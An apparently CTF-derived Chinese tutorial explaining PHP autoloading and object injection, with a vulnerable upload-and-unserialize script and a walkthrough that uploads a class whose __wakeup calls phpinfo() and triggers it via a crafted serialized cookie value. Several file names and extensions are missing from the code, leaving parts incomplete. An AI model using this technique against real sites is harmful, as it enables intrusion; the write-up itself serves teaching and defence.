PHP對象注入的實例分析

注入我們聽到最多的sql了，其實php注入也是黑客常用的一種辦法了，下面我們就來學習一下php注入攻擊的記錄，希望大家能夠通過此教程來做好自己網站安全。

　　1. 寫在前面

最近經常會遇到一些比較有意思的漏洞，比如PHP反序列化漏洞,PHP對象注入。這些漏洞可能在平時很難遇到，但是在CTF以及一些CMS倒是經常看到他們的背影。今天剛剛好手上看到了某CTF的代碼，但是並沒有獲取所有源碼，因此修改了部分代碼進行分析。

　　2. 自動加載

2.0 為什麼要自動加載？

在面向對象編程中，程序員經常會編寫好類然後在一個入口文件中將它們包含進來。如果一個項目非常大，可能存在成百上千個類文件，如果一一包含進去，那麼入口文件就會顯得特別大並且不利於維護。因此，PHP5提供了一種自動加載機制。

2.1 __autoload

function __autoload($classname){

$class_file = strtolower($classname)."";

if(file_exists($class_file)){

require_once("$class_file");

}else{

echo "$class_file does not exist!";

}

}

$obj = new File();

訪問,程序會嘗試實例化File類。PHP的解析器會自動調用__autoload()函數。假設當前目錄下沒有,那麼就會輸出 “ does not exist!” 並且拋出錯誤。

class File{

function __construct(){

echo "File class is instantiated";

}

}

此時訪問,就會得到 “File class is instantiated” 的結果。這樣一來，自動加載機制就非常好理解了。

2.2 手動調用 spl_autoload

void spl_autoload ( string $class_name [, string $file_extensions ] )

它可以接收兩個參數，第一個參數是$class_name，表示類名。第二個參數$file_extensions是可選的，表示類文件的擴展名;如果不指定的話，它將使用默認的.擴展名或。

spl_autoload首先將$class_name變為小寫，然後在所有的include path中搜索$class_或$class_文件(如果不指定$file_extensions參數的話)，如果找到，就加載該類文件。

同樣，你可以手動使用spl_autoload(“Person”, “”)來加載Person類。實際上，它跟require/include差不多

舉個例子

spl_autoload("upload");

$F = new Upload();

這裏沒有指定擴展名，那麼就會在當前目錄下尋找或者並自動加載。其實，到這裏而言，和require、include相比並沒有簡單。相反，它們的功能基本是一模一樣的。

2.3 自動調用 spl_autoload

上面所説的使用手動的方式調用spl_autoload,工作量其實和require/include基本上差不多。調用spl_autoload_register()的時候，如果沒有指定欲註冊的自動裝載函數，則自動註冊 autoload 的默認實現函數spl_autoload()。

舉個例子

spl_autoload_register();

$F = new Upload();

此時，程序會在當前路徑下自動加載或。

　　3. 反序列化

字符串序列化成類之前，類必須提前聲明，否則無法反序列化。

字符串在反序列化的時候，會自動調用__wakeup()魔術方法

Object序列化格式 -> O:strlen(對象名):對象名:對象大小:{s:strlen(屬性名):屬性名:屬性值;(重複剩下的元素)}

　　4. 漏洞剖析

include_once "";

if(isset($req["act"]) && preg_match('/^[a-z0-9_]+$/is', $req["act"])) {

include_once __DIR__ . "/" . $req["act"] . "";

exit;

}

spl_autoload_register();

error_reporting(0);

ini_set('display_errors', false);

$req = [];

foreach([$_GET, $_POST] as $global_var) {

foreach($global_var as $key => $value) {

is_string($value) && $req[$key] = addslashes($value);

}

}

$userinfo = isset($_COOKIE["userinfo"]) ? unserialize($_COOKIE["userinfo"]) : [];

if($_FILES["attach"]["error"] == 0) {

if($_FILES["attach"]['size'] > 0 && $_FILES["attach"]['size'] < 102400) {

$typeAccepted = ["image/jpeg", "image/gif", "image/png"];

$blackext = ["php", "php5", "php3", "html", "swf", "htm"];

$filearr = pathinfo($_FILES["attach"]["name"]);

if(!in_array($_FILES["attach"]['type'], $typeAccepted)) {

exit("type error");

}

if(in_array($filearr["extension"], $blackext)) {

exit("extension error");

}

$filename = $_FILES["attach"]["name"];

if(move_uploaded_file($_FILES["attach"]["tmp_name"], $filename)) {

array_push($userinfo, $filename);

setcookie("userinfo", serialize($userinfo), time() + 60 * 60 * 24 * 30);

echo htmlspecialchars("upload success, new filename is {$filename} .");

} else {

echo "upload error!";

}

}

} else {

echo "no upload file";

}

在中執行了spl_autoload_register()函數，並沒有使用參數。

後綴沒有禁止的類型

在會反序列化COOKIE中的數據

上傳目錄在當前目錄下

因此我們需要如下構造:

上傳一個名為的文件，抓包修改MIME類型。的內容如下所示:

class info{

function __wakeup(){

phpinfo();

}

}

修改cookie的uesrinfo字段為:O:4:”info”:0:{}

訪問即可觸發phpinfo()函數。